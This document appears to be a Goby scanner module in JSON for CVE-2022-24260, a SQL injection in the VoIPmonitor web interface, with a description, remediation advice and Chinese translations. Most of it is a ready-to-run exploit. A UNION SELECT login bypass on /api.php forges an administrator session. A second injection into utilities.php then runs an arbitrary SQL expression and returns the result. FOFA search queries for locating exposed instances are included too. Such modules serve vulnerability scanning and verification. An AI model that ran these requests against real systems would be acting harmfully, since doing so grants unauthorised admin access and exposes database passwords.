Goby/json/VoipMonitor-utilities.php-S...


{
"Name": "VoipMonitor utilities.php SQL Injection (CVE-2022-24260)",
"Description": "<p>VoIPmonitor is an open source network packet sniffer from the VoIPmonitor team.<br></p><p>VoIPmonitor has a SQL injection vulnerability that allows an attacker to obtain administrator privileges and, through injection in the utilities.php file, to retrieve sensitive information such as database user passwords.<br></p>",
"Product": "voipmonitor",
"Homepage": "https://www.voipmonitor.org",
"DisclosureDate": "2022-03-23",
"Author": "abszse",
"FofaQuery": "title=\"VoIPmonitor\"",
"GobyQuery": "title=\"VoIPmonitor\"",
"Level": "3",
"Impact": "<p>VoIPmonitor has a SQL injection vulnerability that allows an attacker to obtain administrator privileges and, through injection in the utilities.php file, to retrieve sensitive information such as database user passwords.<br></p>",
"Recommendation": "<p>Use parameterized (precompiled) queries for all user-supplied input.</p><p>Restrict access with an allowlist enforced by firewalls or other security devices.</p><p>The vendor has released an upgrade that fixes the vulnerability; see the changelog: <a href=\"https://www.voipmonitor.org/changelog-gui?major=5\">https://www.voipmonitor.org/changelog-gui?major=5</a>.</p>",
"References": [
"https://kerbit.io/research/read/blog/3"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "user()",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"success\":true",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "_vm_version",
"bz": ""
}
]
},
"SetVariable": [
"PHPSESSID|lastheader|regex|Set-Cookie: PHPSESSID=(.*?);"
]
},
{
"Request": {
"method": "POST",
"uri": "/php/model/utilities.php",
"follow_redirect": false,
"header": {
"Cookie": "PHPSESSID={{{PHPSESSID}}}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "task=loadConfigSubsystem&params={\"subsystem\": \"tracker\", \"name\":\"name\", \"user_id\":\"'UNION SELECT md5(345) #\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "d81f9c1be2e08964bf9f24b15f0e4900",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"success\":true",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "_vm_version",
"bz": ""
}
]
},
"SetVariable": [
"PHPSESSID|lastheader|regex|Set-Cookie: PHPSESSID=(.*?);"
]
},
{
"Request": {
"method": "POST",
"uri": "/php/model/utilities.php",
"follow_redirect": false,
"header": {
"Cookie": "PHPSESSID={{{PHPSESSID}}}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "task=loadConfigSubsystem&params={\"subsystem\": \"tracker\", \"name\":\"name\", \"user_id\":\"'UNION SELECT {{{cmd}}} #\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"SQL Injection"
],
"VulType": [
"SQL Injection"
],
"CVEIDs": [
"CVE-2022-24260"
],
"CNNVD": [
"CNNVD-202202-315"
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "VoipMonitor 开源网络数据包嗅探器 utilities.php 文件 SQL注入漏洞(CVE-2022-24260)",
"Product": "voipmonitor",
"Description": "<p>VoIPmonitor是VoIPmonitor团队的一个开源网络数据包嗅探器。<br></p><p>Voipmonitor 存在SQL注入漏洞，该漏洞允许获取管理员权限，并且利用utilities.php 文件注入可获得数据库用户密码等敏感信息。<br></p>",
"Recommendation": "<p>1、对用户输入的数据进行预编译处理。</p><p>2、通过防火墙等安全设备设置白名单访问。</p><p>3、厂商已发布升级补丁以修复漏洞，补丁获取链接：<a href=\"https://www.voipmonitor.org/changelog-gui?major=5\">https://www.voipmonitor.org/changelog-gui?major=5</a>。</p>",
"Impact": "<p>Voipmonitor 存在SQL注入漏洞，该漏洞允许获取管理员权限，并且利用utilities.php 文件注入可获得数据库用户密码等敏感信息。<br></p>",
"VulType": [
"SQL 注入"
],
"Tags": [
"SQL 注入"
]
},
"EN": {
"Name": "VoipMonitor utilities.php SQL Injection (CVE-2022-24260)",
"Product": "voipmonitor",
"Description": "<p>VoIPmonitor is an open source network packet sniffer from the VoIPmonitor team.<br></p><p>VoIPmonitor has a SQL injection vulnerability that allows an attacker to obtain administrator privileges and, through injection in the utilities.php file, to retrieve sensitive information such as database user passwords.<br></p>",
"Recommendation": "<p>Use parameterized (precompiled) queries for all user-supplied input.</p><p>Restrict access with an allowlist enforced by firewalls or other security devices.</p><p>The vendor has released an upgrade that fixes the vulnerability; see the changelog: <a href=\"https://www.voipmonitor.org/changelog-gui?major=5\">https://www.voipmonitor.org/changelog-gui?major=5</a>.</p>",
"Impact": "<p>VoIPmonitor has a SQL injection vulnerability that allows an attacker to obtain administrator privileges and, through injection in the utilities.php file, to retrieve sensitive information such as database user passwords.<br></p>",
"VulType": [
"SQL Injection"
],
"Tags": [
"SQL Injection"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}